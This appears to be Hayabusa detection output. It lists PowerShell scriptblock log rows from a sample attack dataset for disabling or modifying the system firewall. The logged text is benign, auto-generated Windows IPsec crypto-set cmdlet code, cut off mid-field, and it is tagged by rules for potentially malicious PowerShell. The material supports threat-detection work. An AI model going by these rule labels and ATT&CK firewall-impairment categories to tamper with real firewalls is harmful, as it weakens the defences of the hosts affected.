[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; 
ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } 
catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] 